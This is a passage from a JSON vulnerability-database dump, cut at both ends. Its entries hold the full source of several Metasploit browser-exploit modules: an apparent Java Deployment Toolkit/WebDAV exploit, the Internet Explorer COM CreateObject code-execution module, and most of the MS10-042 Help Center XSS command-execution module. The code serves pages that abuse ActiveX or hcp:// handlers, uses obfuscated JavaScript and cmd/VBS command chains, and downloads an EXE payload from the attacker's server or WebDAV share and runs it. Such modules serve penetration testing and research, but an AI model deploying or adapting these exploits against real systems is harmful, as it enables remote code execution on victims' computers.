jnlp.dup.gsub(\"\\\\\", \"\\\\\\\\\\\\\\\\\") # jeez\r\n\r\n # The 8ad.. 
CLSID doesn't support the launch method ...\r\n #clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93'\r\n clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'\r\n html = %Q|<html>\r\n<body>Please wait...\r\n<script language=\"javascript\">\r\nvar #{var_str} = \"#{js_jnlp}\";\r\nif (window.navigator.appName == \"Microsoft Internet Explorer\") {\r\nvar #{var_obj} = document.createElement(\"OBJECT\");\r\n#{var_obj}.classid = \"clsid:#{clsid}\";\r\n#{var_obj}.launch(#{var_str});\r\n} else {\r\ntry {\r\nvar #{var_obj2} = document.createElement(\"OBJECT\");\r\n#{var_obj2}.type = \"application/npruntime-scriptable-plugin;deploymenttoolkit\";\r\ndocument.body.appendChild(#{var_obj2});\r\n#{var_obj2}.launch(#{var_str});\r\n} catch (e) {\r\nvar #{var_obj3} = document.createElement(\"OBJECT\");\r\n#{var_obj3}.type = \"application/java-deployment-toolkit\";\r\ndocument.body.appendChild(#{var_obj3});\r\n#{var_obj3}.launch(#{var_str});\r\n}\r\n}\r\n</script>\r\n</body>\r\n</html>\r\n|\r\n elsif (request.uri =~ /\\.htm/i)\r\n print_status(\"Sending non-JS version HTML\")\r\n clsids = [ '8AD9C840-044E-11D1-B3E9-00805F499D93', 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' ]\r\n clsid = clsids[rand(clsids.length)]\r\n html = %Q|<html>\r\n<body>Please wait...\r\n<object id=\"#{var_obj}\" classid=\"clsid:#{clsid}\"\r\nwidth=\"0\" height=\"0\">\r\n<PARAM name=\"launchjnlp\" value=\"#{jnlp}\">\r\n<PARAM name=\"docbase\" value=\"#{docbase}\">\r\n</object>\r\n<embed type=\"application/x-java-applet\"\r\nwidth=\"0\" height=\"0\"\r\nlaunchjnlp=\"#{jnlp}\"\r\ndocbase=\"#{docbase}\"\r\n/>\r\n</body>\r\n</html>\r\n|\r\n else\r\n print_status(\"Sending js detection HTML\")\r\n\r\n # NOTE: The JS version is preferred to the HTML version since it works on more JRE versions\r\n js_uri = rand_text_alphanumeric(8+rand(8)) + \".shtml\"\r\n no_js_uri = rand_text_alphanumeric(8+rand(8)) + \".htm\"\r\n\r\n html = %Q|<html>\r\n<head>\r\n<meta http-equiv=\"refresh\" content=\"2;#{no_js_uri}\" 
/>\r\n</head>\r\n<body>\r\nPlease wait...\r\n<script language=\"javascript\">\r\ndocument.location = \"#{js_uri}\";\r\n</script>\r\n</body>\r\n</html>\r\n|\r\n # end of detection html\r\n end\r\n\r\n send_response_html(cli, html,\r\n {\r\n 'Content-Type' => 'text/html',\r\n 'Pragma' => 'no-cache'\r\n })\r\n end\r\n\r\n end\r\n\r\n #\r\n # OPTIONS requests sent by the WebDav Mini-Redirector\r\n #\r\n def process_options(cli, request, target)\r\n print_status(\"Responding to WebDAV \\\"OPTIONS #{request.uri}\\\" request\")\r\n headers = {\r\n #'DASL' => '<DAV:sql>',\r\n #'DAV' => '1, 2',\r\n 'Allow' => 'OPTIONS, GET, PROPFIND',\r\n 'Public' => 'OPTIONS, GET, PROPFIND'\r\n }\r\n send_response(cli, '', headers)\r\n end\r\n\r\n\r\n #\r\n # PROPFIND requests sent by the WebDav Mini-Redirector\r\n #\r\n def process_propfind(cli, request, target)\r\n path = request.uri\r\n print_status(\"Received WebDAV \\\"PROPFIND #{request.uri}\\\" request\")\r\n body = ''\r\n\r\n if (path =~ /\\.dll$/i)\r\n # Response for the DLL\r\n print_status(\"Sending DLL multistatus for #{path} ...\")\r\n#<lp1:getcontentlength>45056</lp1:getcontentlength>\r\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\r\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"39e0132-b000-43c6e5f8d2f80\"</lp1:getetag>\r\n<lp2:executable>F</lp2:executable>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n\r\n elsif (path =~ /\\/$/) or (not path.sub('/', '').index('/'))\r\n # Response for anything else (generally just /)\r\n print_status(\"Sending directory multistatus 
for #{path} ...\")\r\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\r\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"39e0001-1000-4808c3ec95000\"</lp1:getetag>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n\r\n else\r\n print_status(\"Sending 404 for #{path} ...\")\r\n send_not_found(cli)\r\n return\r\n\r\n end\r\n\r\n # send the response\r\n resp = create_response(207, \"Multi-Status\")\r\n resp.body = body\r\n resp['Content-Type'] = 'text/xml'\r\n cli.send_response(resp)\r\n end\r\n\r\n\r\n #\r\n # Make sure we're on the right port/path to support WebDAV\r\n #\r\n def exploit\r\n if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\r\n fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')\r\n end\r\n\r\n super\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41700/"}, {"lastseen": "2016-02-02T00:08:26", "description": "Internet Explorer COM CreateObject Code Execution. CVE-2006-0003,CVE-2006-4704. 
Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer - COM CreateObject Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4704", "CVE-2006-0003"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16561", "href": "https://www.exploit-db.com/exploits/16561/", "sourceData": "##\r\n# $Id: ie_createobject.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Seh\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:ua_name => HttpClients::IE,\r\n\t\t# In badly misconfigured situations, IE7 and 8 could be vulnerable to\r\n\t\t# this, but by default they throw an ugly popup that stops all script\r\n\t\t# execution until the user deals with it and aborts everything if they\r\n\t\t# click \"no\". Not worth the risk of being unable to try more recent\r\n\t\t# exploits. 
Make sure service packs on top of 6.0 are considered less\r\n\t\t# than the max by setting to 6.1 (which doesn't really exist).\r\n\t\t:ua_maxver => \"6.1\",\r\n\t\t:javascript => true,\r\n\t\t:os_name => OperatingSystems::WINDOWS,\r\n\t\t:vuln_test => 'CreateObject',\r\n\t\t:classid =>\r\n\t\t\t[\r\n\t\t\t\t\t'{BD96C556-65A3-11D0-983A-00C04FC29E36}',\r\n\t\t\t\t\t'{BD96C556-65A3-11D0-983A-00C04FC29E30}',\r\n\t\t\t\t\t'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',\r\n\t\t\t\t\t'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',\r\n\t\t\t\t\t'{6414512B-B978-451D-A0D8-FCFDF33E833C}',\r\n\t\t\t\t\t'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',\r\n\t\t\t\t\t'{639F725F-1B2D-4831-A9FD-874847682010}',\r\n\t\t\t\t\t'{BA018599-1DB3-44f9-83B4-461454C84BF8}',\r\n\t\t\t\t\t'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',\r\n\t\t\t\t\t'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',\r\n\t\t\t\t\t'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',\r\n\t\t\t\t\t'{0006F033-0000-0000-C000-000000000046}',\r\n\t\t\t\t\t'{0006F03A-0000-0000-C000-000000000046}',\r\n\t\t\t],\r\n\t\t#:rank => ExcellentRanking # reliable exe writer\r\n\t})\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Internet Explorer COM CreateObject Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a generic code execution vulnerability in Internet\r\n\t\t\t\tExplorer by abusing vulnerable ActiveX objects.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'hdm',\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# MDAC\r\n\t\t\t\t\t[ 'MSB', 'MS06-014' ],\r\n\t\t\t\t\t[ 'CVE', '2006-0003' ],\r\n\t\t\t\t\t[ 'OSVDB', '24517' ],\r\n\t\t\t\t\t# WMI Object Broker\r\n\t\t\t\t\t[ 'MSB', 'MS06-073' ],\r\n\t\t\t\t\t[ 'CVE', '2006-4704' ],\r\n\t\t\t\t\t[ 'OSVDB', '30155' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t\t'StackAdjustment' => 
-3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\r\n\t\t\t\t\t# Patched\r\n\t\t\t\t\t[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],\r\n\t\t\t\t\t# Found in mpack\r\n\t\t\t\t\t[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],\r\n\r\n\t\t\t\t\t# Patched\r\n\t\t\t\t\t[ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],\r\n\r\n\t\t\t\t\t# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)\r\n\t\t\t\t\t[ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],\r\n\t\t\t\t\t[ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],\r\n\r\n\t\t\t\t\t# Visual Studio components, not marked as safe\r\n\t\t\t\t\t[ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],\r\n\t\t\t\t\t[ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],\r\n\t\t\t\t\t[ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],\r\n\t\t\t\t\t[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],\r\n\t\t\t\t\t[ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The controls below can launch the \"installing component\" dialogs...\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t# Not marked as safe\r\n\t\t\t\t\t[ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],\r\n\r\n\t\t\t\t\t# Not marked as safe\r\n\t\t\t\t\t[ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],\r\n\r\n\t\t\t\t\t# Found exploitable in the wild (no details)\r\n\t\t\t\t\t[ 'UNKNOWN - Outlook.Application', { 'CLSID' => 
'{0006F03A-0000-0000-C000-000000000046}'} ],\r\n\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Apr 11 2006'))\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tif (request.uri.match(/payload/))\r\n\t\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\t\t\tdata = generate_payload_exe({ :code => p.encoded })\r\n\t\t\tprint_status(\"Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\t\tsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# Build out the HTML response page\r\n\t\tvar_html = rand_text_alpha(rand(30)+2)\r\n\t\tvar_func_exploit = rand_text_alpha(rand(30)+2);\r\n\t\tvar_func_go = rand_text_alpha(rand(30)+2);\r\n\t\tvar_func_createo = rand_text_alpha(rand(30)+2);\r\n\t\tvar_exe_name = rand_text_alpha(rand(30)+2);\r\n\t\tvar_objects = ''\r\n\r\n\t\t# Build the object list based on target selection\r\n\t\tif (target.name == 'Automatic')\r\n\t\t\ttargets.each do |t|\r\n\t\t\t\tnext if not t['CLSID']\r\n\t\t\t\tvar_objects += t['CLSID'].unpack('C*').map{|c| \" '#{c.chr}' \"}.join(\"+\") + \",\"\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tvar_objects += target['CLSID'].unpack('C*').map{|c| \" '#{c.chr}' \"}.join(\"+\") + \",\"\r\n\t\tend\r\n\r\n\r\n\t\tcontent = %Q^\r\n<html><head><title></title>\r\n<script language=\"javascript\">\r\n\r\nfunction #{var_func_createo}( o , n ) {\r\n\tvar r = null;\r\n\r\n\ttry { eval(\"r=o\" + \".C\" + \"re\" + \"ate\" + \"Ob\" + \"je\" + \"ct(n)\" ) }catch(e){}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval(\"r=o\" + \".Cr\" + \"ea\" + \"teO\" + \"bj\" + \"ect(n,'')\" ) }catch(e){}\r\n\t}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval(\"r=o\" + \".Cr\" + \"ea\" + \"teO\" + \"bj\" + \"ect(n,'','')\" ) }catch(e){}\r\n\t}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"je\" + \"ct('',n)\" ) }catch(e){}\r\n\t}\r\n\r\n\tif (! 
r) {\r\n\t\ttry { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"ject(n,'')\" ) }catch(e){}\r\n\t}\r\n\r\n\tif (! r) {\r\n\t\ttry { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"ject(n)\" ) }catch(e){}\r\n\t}\r\n\r\n\treturn( r );\r\n}\r\n\r\nfunction #{var_func_go}( a ) {\r\n\r\n\tvar s = #{var_func_createo}( a, \"W\" + \"Sc\" + \"ri\" + \"pt\" + \".S\" + \"he\" + \"ll\" );\r\n\r\n\tvar o = #{var_func_createo}( a, \"A\" + \"DO\" + \"D\" + \"B.S\" + \"tr\" + \"eam\" );\r\n\r\n\tvar e = s.Environment( \"P\" + \"ro\" + \"ce\" + \"ss\" );\r\n\r\n\r\n\tvar url = document.location + '/p' + 'ay' + 'lo' + 'ad';\r\n\tvar xml = null;\r\n\tvar bin = e.Item( \"T\" + \"E\" + \"M\" + \"P\" ) + \"\\\\\\\\#{var_exe_name}\" + \".e\" + \"xe\";\r\n\tvar dat;\r\n\r\n\ttry { xml=new XMLHttpRequest(); }\r\n\tcatch(e) {\r\n\t\ttry { xml = new ActiveXObject(\"Microsoft.XMLHTTP\"); }\r\n\t\tcatch(e) {\r\n\t\t\txml = new ActiveXObject(\"MSXML2.ServerXMLHTTP\");\r\n\t\t}\r\n\t}\r\n\r\n\tif (! xml) {\r\n\t\treturn(0);\r\n\t}\r\n\r\n\txml.open(\"GET\", url, false);\r\n\txml.send(null);\r\n\tdat = xml.responseBody;\r\n\r\n\to.Type = 1 ;\r\n\to.Mode = 3 ;\r\n\to.Open ( ) ;\r\n\to.Write ( dat ) ;\r\n\to.SaveToFile ( bin, 2) ;\r\n\r\n\ts.Run ( bin , 0 );\r\n}\r\n\r\nfunction #{var_func_exploit}( ) {\r\n\tvar i = 0;\r\n\tvar t = new Array( #{var_objects} null );\r\n\r\n\twhile (t[i]) {\r\n\t\tvar a = null;\r\n\r\n\t\tif (t[i].substring(0,1) == '{') {\r\n\t\t\ta = document.createElement(\"object\");\r\n\t\t\ta.setAttribute(\"cl\" + \"as\" + \"sid\", \"cl\" + \"s\" + \"id\" +\":\" + t[i].substring( 1, t[i].length - 1 ) ) ;\r\n\t\t} else {\r\n\t\t\ttry { a = new ActiveXObject(t[i]); } catch(e){}\r\n\t\t}\r\n\r\n\t\tif (a) {\r\n\t\t\ttry {\r\n\t\t\t\tvar b = #{var_func_createo}( a , \"W\" + \"Sc\" + \"ri\" + \"pt\" + \".S\" + \"he\" + \"ll\" ) ;\r\n\t\t\t\tif (b) {\r\n\t\t\t\t\t#{var_func_go}( a ) ;\r\n\t\t\t\t\treturn(0) ;\r\n\t\t\t\t}\r\n\t\t\t} 
catch(e){\r\n\t\t\t}\r\n\t\t}\r\n\t\ti++;\r\n\t}\r\n}\r\n</script>\r\n</head>\r\n<body onload='#{var_func_exploit}()'>\r\n#{var_html}\r\n</body>\r\n</html>\r\n\r\n^\r\n\r\n\r\n\t\tcontent = Rex::Text.randomize_space(content)\r\n\r\n\t\tprint_status(\"Sending #{self.name} exploit HTML to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16561/"}], "metasploit": [{"lastseen": "2020-08-12T22:07:19", "description": "Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme \"hcp\". Due to an error in validation of input to hcp:// combined with a local cross site scripting vulnerability and a specialized mechanism to launch the XSS trigger, arbitrary command execution can be achieved. On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it can be used to launch the exploit automatically. If IE8 and WMP11, either can be used to launch the attack, but both pop dialog boxes asking the user if execution should continue. This exploit detects if non-intrusive mechanisms are available and will use one if possible. In the case of both IE8 and WMP11, the exploit defaults to using an iframe on IE8, but is configurable by setting the DIALOGMECH option to \"none\" or \"player\". 
This module creates a WebDAV service from which the payload is copied to the victim machine.\n", "published": "2010-07-13T19:30:47", "type": "metasploit", "title": "Microsoft Help Center XSS and Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "modified": "2019-05-23T12:01:21", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS10_042_HELPCTR_XSS_CMD_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n #\n # This module acts as an HTTP server\n #\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t\t=> 'Microsoft Help Center XSS and Command Execution',\n 'Description'\t=> %q{\n Help and Support Center is the default application provided to access online\n documentation for Microsoft Windows. Microsoft supports accessing help documents\n directly via URLs by installing a protocol handler for the scheme \"hcp\". Due to\n an error in validation of input to hcp:// combined with a local cross site\n scripting vulnerability and a specialized mechanism to launch the XSS trigger,\n arbitrary command execution can be achieved.\n\n On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it\n can be used to launch the exploit automatically. If IE8 and WMP11, either can\n be used to launch the attack, but both pop dialog boxes asking the user if\n execution should continue. This exploit detects if non-intrusive mechanisms are\n available and will use one if possible. 
In the case of both IE8 and WMP11, the\n exploit defaults to using an iframe on IE8, but is configurable by setting the\n DIALOGMECH option to \"none\" or \"player\".\n\n This module creates a WebDAV service from which the payload is copied to the\n victim machine.\n },\n 'Author'\t\t=>\n [\n 'Tavis Ormandy', # Original discovery\n 'natron' # Metasploit version\n ],\n 'License'\t\t=> MSF_LICENSE,\n 'References'\t=>\n [\n [ 'CVE', '2010-1885' ],\n [ 'OSVDB', '65264' ],\n [ 'MSB', 'MS10-042']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload'\t\t=>\n {\n 'Space'\t=> 2048,\n },\n 'Platform'\t\t=> 'win',\n 'Targets'\t\t=>\n [\n [ 'Automatic',\t{ } ]\n ],\n 'DisclosureDate' => 'Jun 09 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptPort.new(\t'SRVPORT',\t\t [ true, \"The daemon port to listen on (do not change)\", 80 ]),\n OptString.new(\t'URIPATH',\t\t [ true, \"The URI to use (do not change).\", \"/\" ]),\n OptString.new(\t'DIALOGMECH',\t [ true, \"IE8/WMP11 trigger mechanism (none, iframe, or player).\", \"iframe\"])\n ])\n\n deregister_options('SSL', 'SSLVersion') # Just for now\n end\n\n def on_request_uri(cli, request)\n\n # If there is no subdirectory in the request, we need to redirect.\n if (request.uri == '/') or not (request.uri =~ /\\/[^\\/]+\\//)\n if (request.uri == '/')\n subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'\n else\n subdir = request.uri + '/'\n end\n print_status(\"Request for \\\"#{request.uri}\\\" does not contain a sub-directory, redirecting to #{subdir} ...\")\n send_redirect(cli, subdir)\n return\n end\n\n\n case request.method\n when 'OPTIONS'\n process_options(cli, request)\n when 'PROPFIND'\n process_propfind(cli, request)\n when 'GET'\n process_get(cli, request)\n else\n print_error(\"Unexpected request method encountered: #{request.method}\")\n end\n\n end\n\n def process_get(cli, request)\n\n @my_host = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n webdav_loc = \"\\\\\\\\#{@my_host}\\\\#{@random_dir}\\\\#{@payload}\"\n @url_base = \"http://\" + @my_host\n\n if (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri))\n print_status \"Sending payload executable to target ...\"\n return if ((p = regenerate_payload(cli)) == nil)\n data = generate_payload_exe({ :code => p.encoded })\n\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\n return\n end\n\n if request.uri.match(/\\.gif$/)\n # \"world's smallest gif\"\n data = \"GIF89a\\x01\\x00\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00!\\xF9\\x04\\x01\"\n data += \"\\x00\\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\x02\\x02D\\x01\\x00;\"\n print_status \"Sending gif image to WMP\"\n send_response(cli, data, { 'Content-TYpe' => 'image/gif' } )\n end\n\n # ASX Request Inbound\n if request.uri.match(/\\.asx$/)\n asx = %Q|<ASX VERSION=\"3.0\">\n<PARAM name=\"HTMLView\" value=\"URLBASE/STARTHELP\"/>\n<ENTRY>\n <REF href=\"URLBASE/IMGFILE\"/>\n</ENTRY>\n</ASX>\n|\n asx.gsub!(/URLBASE/, @url_base)\n asx.gsub!(/STARTHELP/, @random_dir + \"/\" + @start_help)\n asx.gsub!(/IMGFILE/, @random_dir + \"/\" + @img_file)\n print_status(\"Sending asx file\")\n send_response(cli, asx, { 'Content-Type' => 'text/html' })\n return\n end\n\n # iframe request inbound from either WMP or IE7\n if request.uri.match(/#{@start_help}/)\n\n help_html = <<-EOS\n<iframe 
src=\"hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E\">\nEOS\n\n rand_vbs\t= rand_text_alpha(rand(2)+1) + \".vbs\"\n copy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\\\#{@payload}^\n vbs_content = %Q|WScript.CreateObject(\"WScript.Shell\").Run \"#{copy_launch}\",0,false|\n write_vbs\t= %Q|cmd /c echo #{vbs_content}>%TEMP%\\\\#{rand_vbs}|\n launch_vbs = %Q|cscript %TEMP%\\\\#{rand_vbs}>nul|\n concat_cmds = \"#{write_vbs}|#{launch_vbs}\"\n\n eval_block = \"Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));\"\n eval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block))\n help_html.gsub!(/COMMANDS/, eval_block)\n print_status(\"Sending exploit trigger\")\n send_response(cli, help_html, { 'Content-Type' => 'text/html' })\n return\n end\n\n # default initial response\n js = %Q|\nvar asx = \"URLBASE/ASXFILE\";\nvar ifr = \"URLBASE/IFRFILE\";\n\nfunction launchiframe(src) {\n var o = document.createElement(\"IFRAME\");\n o.setAttribute(\"width\",\"0\");\n o.setAttribute(\"height\",\"0\");\n o.setAttribute(\"frameborder\",\"0\");\n o.setAttribute(\"src\",src);\n document.body.appendChild(o);\n}\n\nif (window.navigator.appName == \"Microsoft Internet Explorer\") {\n var ua = window.navigator.userAgent;\n var re = new RegExp(\"MSIE 
([0-9]{1,}[\\.0-9]{0,})\");\n re.exec(ua)\n ver = parseFloat( RegExp.$1 );\n\n // if ie8, check WMP version\n if (ver > 7) {\n var o = document.createElement(\"OBJECT\");\n o.setAttribute(\"classid\", \"clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6\");\n o.setAttribute(\"uiMode\", \"invisible\");\n // if wmp9, go ahead and launch\n if( parseInt(o.versionInfo) < 10 ) {\n o.openPlayer(asx);\n // if > wmp9, only launch if user requests\n } else {\n DIALOGMECH\n }\n // if ie7, use iframe\n } else {\n launchiframe(ifr);\n }\n} else {\n // if other, try iframe\n launchiframe(ifr);\n}\n|\n\n html = %Q|<html>\n<head></head><body><script>JAVASCRIPTFU\n</script>\n</body>\n</html>\n|\n case datastore['DIALOGMECH']\n when \"player\"\n mech = \"o.openPlayer(asx);\"\n when \"iframe\"\n mech = \"launchiframe(ifr);\"\n when \"none\"\n mech = \"\"\n else\n mech = \"\"\n end\n\n html.gsub!(/JAVASCRIPTFU/, js)\n html.gsub!(/DIALOGMECH/, mech)\n html.gsub!(/URLBASE/, @url_base)\n html.gsub!(/ASXFILE/, @random_dir + \"/\" + @asx_file)\n html.gsub!(/IFRFILE/, @random_dir + \"/\" + @start_help)\n\n print_status(\"Sending #{self.name}\")\n\n headers = {\n 'Content-Type'\t\t=> 'text/html',\n #'X-UA-Compatible'\t=> 'IE=7'\n }\n\n send_response(cli, html, headers)\n end\n\n #\n # OPTIONS requests sent by the WebDav Mini-Redirector\n #\n def process_options(cli, request)\n print_status(\"Responding to WebDAV OPTIONS request\")\n headers = {\n #'DASL' => '<DAV:sql>',\n #'DAV' => '1, 2',\n 'Allow' => 'OPTIONS, GET, PROPFIND',\n 'Public' => 'OPTIONS, GET, 